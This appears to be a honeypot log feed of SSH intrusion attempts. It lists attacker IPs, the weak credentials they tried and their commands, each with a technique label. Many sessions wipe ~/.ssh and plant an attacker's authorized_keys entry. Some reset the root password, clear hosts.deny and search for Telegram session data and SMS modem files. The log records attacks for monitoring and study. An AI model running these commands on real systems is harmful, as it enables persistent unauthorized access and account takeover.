$ ps aux | head -10

$ whoami

↳ privilege check

🎭 spice_db (103.6.132.9) — Aligarh, India · 1 session · 2 cmds

2026-04-23 05:40 EDT · as oracle/Oracle9

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_2 (47.76.49.128) — Hong Kong, Hong Kong · 21 sessions · 21 cmds

2026-04-23 04:09 EDT · as admin/admin123, deploy/deploy, deploy/deploy123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×21

🎭 silk_root_4 (8.130.125.187) — Beijing, China · 1 session · 1 cmd

2026-04-23 03:55 EDT · as guest/guest

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 wraith_root_32 (165.154.6.56) — Hong Kong, Hong Kong · 3 sessions · 6 cmds

2026-04-22 23:44 EDT · as oracle/ORACLE, oracle/Oracle28!, oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 cipher (47.239.191.37) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-22 22:32 EDT · as user/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 stroopwafel_sol_2 (176.65.139.95) — Eygelshoven, The Netherlands · 35 sessions · 35 cmds

2026-04-22 19:55 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 lantern_root_6 (121.196.151.83) — Hangzhou, China · 1 session · 1 cmd

2026-04-22 21:05 EDT · as ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 silk_root_5 (8.136.218.113) — Hangzhou, China · 1 session · 1 cmd

2026-04-22 19:29 EDT · as admin/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 specter_root_35 (210.79.190.151) — Cicurug, Indonesia · 1 session · 2 cmds

2026-04-22 18:35 EDT · as oracle/Oracle#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 silk_root_6 (47.112.205.17) — Shenzhen, China · 1 session · 1 cmd

2026-04-22 18:18 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 scone_root_8 (45.43.86.48) — City of London, United Kingdom · 1 session · 2 cmds

2026-04-22 18:11 EDT · as oracle/Oracle#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 burger_root_3 (34.86.213.47) — Washington, United States · 2 sessions · 2 cmds

2026-04-06 08:19 EDT · as deploy/deploy, root/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 wraith_root_33 (34.78.29.97) — Brussels, Belgium · 1 session · 2 cmds

2026-04-22 15:58 EDT · as oracle/Oracle28

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 star_root_8 (43.130.57.128) — Santa Clara, United States · 1 session · 19 cmds

2026-04-22 15:50 EDT · as root/pass123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:PBboWA3Jo83d"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_41 (210.79.142.221) — Pulerejo, Indonesia · 1 session · 2 cmds

2026-04-22 15:31 EDT · as oracle/Oracle28

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 kimchi_root_3 (115.68.207.110) — Gwangmyeong, South Korea · 1 session · 2 cmds

2026-04-22 15:20 EDT · as oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 burger_db (34.123.134.194) — Council Bluffs, United States · 1 session · 2 cmds

2026-04-22 14:15 EDT · as oracle/Oracle20!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 star_root (142.93.176.33) — Clifton, United States · 35 sessions · 35 cmds

2026-04-22 12:26 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 rogue_root_31 (37.26.198.15) — Bialystok, Poland · 1 session · 9 cmds

2026-04-22 13:36 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 star_root_2 (50.188.96.138) — Houston, United States · 1 session · 1 cmd

2026-04-22 13:08 EDT · as root/password

echo

$ echo TEST

🎭 ghost_root_43 (103.186.1.143) — Sukabumi, Indonesia · 1 session · 19 cmds

2026-04-22 11:58 EDT · as root/pass123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:Q45OSNihM1WR"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 shadow_root_26 (163.7.11.126) — Banguntapan, Indonesia · 1 session · 2 cmds

2026-04-22 11:54 EDT · as oracle/oracle08!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 bistro_root_2 (51.158.120.121) — Paris, France · 1 session · 2 cmds

2026-04-22 11:45 EDT · as oracle/oracle08!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_32 (38.253.239.21) — Jakarta, Indonesia · 1 session · 2 cmds

2026-04-22 11:45 EDT · as oracle/oracle08!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_4 (8.218.229.26) — Hong Kong, Hong Kong · 15 sessions · 15 cmds

2026-04-22 09:29 EDT · as admin/admin123, admin/password, oracle/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×15

🎭 panda_root_5 (124.251.110.186) — Chaowai, China · 1 session · 2 cmds

2026-04-22 09:48 EDT · as oracle/Oracle5

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_44 (103.52.114.250) — Cicurug, Indonesia · 1 session · 2 cmds

2026-04-22 09:44 EDT · as oracle/M3gaP33!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dragon_root_8 (61.184.21.192) — Wuhan, China · 1 session · 2 cmds

2026-04-22 09:18 EDT · as oracle/M3gaP33!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 silk_root_7 (118.145.131.27) — Haidian, China · 1 session · 2 cmds

2026-04-22 08:37 EDT · as oracle/Oracle03!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 yankee_root_5 (198.98.62.211) — New York, United States · 1 session · 2 cmds

2026-04-22 08:35 EDT · as oracle/Oracle03!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_19 (163.7.6.74) — Banguntapan, Indonesia · 1 session · 20 cmds

2026-04-22 08:31 EDT · as user/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\n1M3O8NbtkHFv\n1M3O8NbtkHFv"|passwd|bash

$ Enter new UNIX password:

$ echo "password\n1M3O8NbtkHFv\n1M3O8NbtkHFv\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 silk_db_2 (14.103.173.166) — Beijing, China · 1 session · 2 cmds

2026-04-22 08:27 EDT · as oracle/Oracle03!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 windmill_root_2 (13.81.183.28) — Amsterdam, Netherlands · 1 session · 2 cmds

2026-04-22 08:25 EDT · as oracle/Oracle03!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

